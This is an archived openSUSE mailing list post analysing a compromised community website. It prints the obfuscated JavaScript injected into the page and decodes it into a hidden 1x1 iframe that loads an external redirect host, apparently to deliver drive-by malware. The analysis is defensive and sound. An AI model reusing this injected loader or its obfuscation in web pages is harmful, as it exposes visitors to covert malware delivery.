Mailinglist Archive: opensuse-project (465 mails)

< Previous Next >
Re: [opensuse-project] openuse-community.org is a bad website
  • From: David Haller <dnh@xxxxxxxxxxxx>
  • Date: Fri, 2 Jul 2010 01:06:06 +0200
  • Message-id: <20100701230606.GA7231@xxxxxxxxxxxxxxxxxx>
Hello,

On Thu, 01 Jul 2010, Marcus Meissner wrote:
On Thu, Jul 01, 2010 at 06:35:44PM +0200, Cristian Morales Vega wrote:
2010/7/1 Andrea Florio <andrea@xxxxxxxxxxxx>:
Hash: SHA1

According to firefox/google, opensuse-community.org is a bad website...
anything we can do??

The FAQ explains how it works: http://www.stopbadware.org/home/faq

But it's my understanding that it has already been reported:
http://www.stopbadware.org/reports/8e9ba36718d9116809d178a7057d0f47

curl http://opensuse-community.org/Welcome_to_openSUSE-Community.org|less

The very first line looks truly like malware:

script language=JavaScript document.write(unescape('%3c'+'%73cri%70t
language=Java%53cript%3edo'+'cu%6d%65n%74.write%28unesca%70%65%28%27%253c%69frame%25%320w%27+%27i%25%364%27+'+'%27%74h=1%20he%25%369g%27+%27%68t%253d1
%62%256f'+'%2572d%256'+'5r=%27+%270 %256%36%72amebo%2572'+'der%253%640
%257%33%2572c=%2527h%257%34%74%27+%27p:%252%66%2f%73uin'+'%2574%25%372a%256%36.co%256d/top%25310'+'%25%330/in%2e%63g%69%3f%34%2527%25%33e%253c%2f%256%39%66ram%256%35%253%65%27%29%29%3c/s'+'%63ript%3e'))

So it seems at a deeper look.

$ jsshell
js> unescape('%3c'+'%73cri%70t
language=Java%53cript%3edo'+'cu%6d%65n%74.write%28unesca%70%65%28%27%253c%69frame%25%320w%27+%27i%25%364%27+'+'%27%74h=1%20he%25%369g%27+%27%68t%253d1
%62%256f'+'%2572d%256'+'5r=%27+%270 %256%36%72amebo%2572'+'der%253%640
%257%33%2572c=%2527h%257%34%74%27+%27p:%252%66%2f%73uin'+'%2574%25%372a%256%36.co%256d/top%25310'+'%25%330/in%2e%63g%69%3f%34%2527%25%33e%253c%2f%256%39%66ram%256%35%253%65%27%29%29%3c/s'+'%63ript%3e')
<script
language=JavaScript>document.write(unescape('%3ciframe%20w'+'i%64'+'th=1
he%69g'+'ht%3d1 b%6f%72d%65r='+'0 %66ramebo%72der%3d0
%73%72c=%27h%74t'+'p:%2f/suin%74%72a%66.co%6d/top%310%30/in.cgi?4%27%3e%3c/%69fram%65%3e'))</script>
js> unescape('%3ciframe%20w'+'i%64'+'th=1 he%69g'+'ht%3d1 b%6f%72d%65r='+'0
%66ramebo%72der%3d0
%73%72c=%27h%74t'+'p:%2f/suin%74%72a%66.co%6d/top%310%30/in.cgi?4%27%3e%3c/%69fram%65%3e')
<iframe width=1 height=1 border=0 frameborder=0
src='http://suintraf.com/top100/in.cgi?4'></iframe>
js>

So, it "injects" an "invisible" 1x1 iframe. The weird stuff is:
http://suintraf.com/top100/in.cgi?4 redirects to linux.com, if you
call it as a linux browser.

But if you call it as e.g. an ie6, you get redirected to
http://www.google.com/errors/asfe/system_down.html

So, I guess depending on which browser you use (and whatever else) you
could get redirected to a site where malware is, trying to be
installed as drive-by-download or whatever.

Anyway, JavaScript unescape orgies are always a bad sign. Please, tell
the admins to reinstall from a clean source / backups. And webpin's
index has been broken for quite a while anyway.

-dnh

PS: jsshell is part of libjs, no idea if oS/packman package it.

--
[Stefan Wegmann sucht ein optisch ansprechendes Brennprogramm] Hhhhmmm, unter
diesem Aspekt habe ich das ganze noch gar nicht betrachtet. Was würde denn
Deinen gehobenen ästhetischen Ansprüchen entgegenkommen? Ein zartes Chartreuse
im leicht fluffigen Kontrast zu einem frühlingshaften Ostereidottergelb? Mit
Buttons im floralen Design und Chiffoneske Hilfsfenster mit einer luftig
durchscheinenden Optik? [Thomas Templin in suse-linux]
--
To unsubscribe, e-mail: opensuse-project+unsubscribe@xxxxxxxxxxxx
For additional commands, e-mail: opensuse-project+help@xxxxxxxxxxxx

< Previous Next >